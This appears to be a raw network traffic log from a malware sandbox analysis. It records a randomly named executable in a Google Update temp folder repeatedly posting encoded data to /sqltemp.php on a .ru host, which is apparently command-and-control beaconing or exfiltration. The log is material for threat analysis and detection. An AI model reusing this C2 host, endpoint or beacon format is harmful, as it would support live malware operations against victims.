                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:34.611102104 CET | 1124 | OUT | Data Raw: 56 52 5f 55 54 5e 51 50 58 56 52 59 56 50 59 5e 5b 58 54 5b 55 5c 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_UT^QPXVRYVPY^[XT[U\P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._&,> $-?C/)>7>;<?*=' 2Z?%?9:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:34.698385000 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:34.984730959 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksvlGXq0Ai7uq3BOe3Mhz%2F8FHylKRp65k888y2%2FUQO9B5s6vlt3ziU9XNMCzV6O1e%2F%2FU%2Fmr6cbXaG2syKeIfkzUTsgQvnuSMM02lgSWNxr0xhg71tOAcC17dMNR2mIH9WbuPYPLz"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3659998e2c481-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2661&min_rtt=1513&rtt_var=2864&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=136423&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  112 | 192.168.2.6 | 62751 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:35.112445116 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:35.469870090 CET | 1124 | OUT | Data Raw: 53 57 5a 51 54 5e 51 56 58 56 52 59 56 5d 59 51 5b 5f 54 5c 55 5c 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SWZQT^QVXVRYV]YQ[_T\U\P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.[3/54!3X?/T -#(: =-4 !,*8)%'T.&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:35.557209969 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:35.822882891 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yRqle7UAq9bQ8%2FFh%2B1jUSx%2FRvFncuwFQowryD%2BXFWvi7h%2BQE1FsQT06gYqwOQFvyJwbefYi4uOCwAXbyhCB1Rk5fVqNgEjOfzztWX3Mox3tApffvEYpAEbTiKqNPZZUKp0Dt3jmA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3659ef9bb2395-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2663&min_rtt=2031&rtt_var=2026&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=205894&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  113 | 192.168.2.6 | 62752 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:35.995052099 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:36.345165014 CET | 1124 | OUT | Data Raw: 53 53 5a 50 54 50 51 57 58 56 52 59 56 5d 59 53 5b 5e 54 5f 55 5c 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SSZPTPQWXVRYV]YS[^T_U\P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._3<>7<9'-#B;:&!-;(_;S(= 4<"&/?S9:&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:36.438611984 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  114 | 192.168.2.6 | 62753 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:36.586746931 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:36.938668966 CET | 1964 | OUT | Data Raw: 53 57 5f 57 51 5c 54 50 58 56 52 59 56 5d 59 5e 5b 5d 54 5e 55 58 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_WQ\TPXVRYV]Y^[]T^UXP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&/: ?:3(,*=R#<9),]#<*;2Y?W-*&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:37.030456066 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:37.320019007 CET | 958 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g60EwD1PEg%2FBgSSRpQ1YlLHxRy3fjB5So8uqbPzA6ELIM5Nvt%2F8Bve%2Fc7VaTwMyfak1xRoB8HSuO9Np3onl2o6R9t1%2BFsLAy8Hq1OviF84050ad4EOcg3%2BvSiv6NktYQgsZWaNL%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365a82ebcf3bb-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1566&rtt_var=592&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=919395&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 51 29 13 36 56 25 0b 2f 03 2b 3d 2c 0e 25 10 0c 5b 3f 38 26 17 27 2e 3b 5a 3d 39 2b 1e 22 12 35 59 32 06 33 02 34 04 3b 1c 24 34 2b 59 05 1c 20 44 35 01 23 01 2a 5b 2b 16 32 2c 3e 03 24 00 24 5e 2b 38 01 0c 20 38 3b 59 30 13 16 5b 2a 04 28 1d 30 12 20 03 2f 3f 08 0d 30 10 2c 54 00 11 25 0f 25 22 23 01 20 27 2c 10 35 0f 21 1d 31 37 2a 56 32 3c 24 09 20 5f 26 1b 32 22 3b 1d 22 1d 25 02 26 5d 31 10 37 13 01 18 28 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%Q)6V%/+=,%[?8&'.;Z=9+"5Y234;$4+Y D5#*[+2,>$$^+8 8;Y0[*(0 /?0,T%%"# ',5!17*V2<$ _&2";"%&]17(>%S -H?WS0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  115 | 192.168.2.6 | 62754 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:36.739120960 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:37.094784975 CET | 1124 | OUT | Data Raw: 56 51 5f 5d 54 5f 51 57 58 56 52 59 56 5e 59 52 5b 5b 54 5e 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQ_]T_QWXVRYV^YR[[T^UXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?)#,>%>?A,9"#=^<_#R*=$]7<++2;:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:37.183365107 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:37.461478949 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMj0gG31lrZdmLH6hXKk8ovMaG5tiRf1%2Feb1PhzJtNVLO2Xqh8EGGOr0jJzkQvm905xj5ayhuD2Wu7AwLnZQtPoz9YiqhiHW2GtCw22fmjX7QSABncuTvkebSDsDFAfLVqbUO8cw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365a91f9a4405-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2066&min_rtt=1651&rtt_var=1449&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=293644&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  116 | 192.168.2.6 | 62755 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:37.580358982 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:37.938699961 CET | 1124 | OUT | Data Raw: 56 57 5f 51 51 5c 54 50 58 56 52 59 56 5b 59 5e 5b 5c 54 51 55 58 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VW_QQ\TPXVRYV[Y^[\TQUXPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._'7/-'=<;)>!-0?)'S*$[42X+6%+T:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:38.034554005 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:38.290910959 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qW2ONNKKyfc8ePWKZTwBIh60ir5wAnaAyEkpM02gJOKP6xT2zvhlDjbXxLTVtYWaeT3hIsVau%2FFXQnEoNQWuOCVbHc4yTHvlXxuzMkhpmlsJIX%2FmdaURr%2F46dBCEHEY8p5o%2BIAk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365ae69dd8c24-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5036&min_rtt=1957&rtt_var=6893&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=54901&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  117 | 192.168.2.6 | 62756 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:38.429307938 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:38.782418966 CET | 1120 | OUT | Data Raw: 53 50 5f 5d 54 58 54 5c 58 56 52 59 56 59 59 55 5b 5e 54 51 55 5a 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_]TXT\XVRYVYYU[^TQUZP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._' Y9^%=7.*> -??U*>##+]*8!C2,*&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:38.908606052 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:39.168900967 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEBBl0qENQVc7HS3w73ai%2BEEbz9qcWvAE%2FzYstrLWvzDtaeY1aQyfvXraNMDwpUg1Li1xlRrVk3BRID4DKP08T4XmSBCjsNm%2FFYbU4dM3bLZIdCdZ%2BF1%2FwJBBcxDLzBd%2Fv0rDFkj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365b3dfeb238e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3717&min_rtt=1990&rtt_var=4201&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1422&delivery_rate=92340&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  118 | 192.168.2.6 | 62757 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:39.299521923 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:39.658600092 CET | 1124 | OUT | Data Raw: 56 50 5f 52 54 58 54 54 58 56 52 59 56 5f 59 52 5b 5f 54 5f 55 5a 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VP_RTXTTXVRYV_YR[_T_UZPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'?=\#&$>$;- 0Y+)#R==#727(8%C$/9:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:39.751976967 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:39.925379038 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYnu1ZkmwL4EDD19D14ooVoF3ufcCvFFpos4%2BPaMnghRmsLQAJ5pEGs4eBZqXTjniwiOn2U9PZ42lExVVd1X4bI%2B44YMVjDouMIp9bigY%2FR5CEWe93D6shVMAGc2fEeCExijdEXT"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365b92fd443aa-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1776&rtt_var=685&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=787911&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  119 | 192.168.2.6 | 62758 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:40.053627968 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:40.408674002 CET | 1124 | OUT | Data Raw: 56 57 5f 51 51 5b 54 55 58 56 52 59 56 5c 59 5e 5b 5f 54 5b 55 5b 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VW_QQ[TUXVRYV\Y^[_T[U[P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.X',> /]$X /*#?W*>X!2+]+>2<<.*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:40.506849051 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:40.771244049 CET | 814 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUL2r3aG2a%2Bqh6K%2FAqhbotEKkuUxH%2FG1jUSOSFTk5arZGMelZ04oCyxQX86Mpp6yR09mEvQkV%2Br26FUu%2BZHVpBGqlAQFdgZkAkj%2B5oz%2FldqPxbWIJ7SO%2FbQwaeBiXcY87z6Bius3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365bddae743d9-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4343&min_rtt=1734&rtt_var=5869&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=64567&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  120 | 192.168.2.6 | 62759 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:40.895390034 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
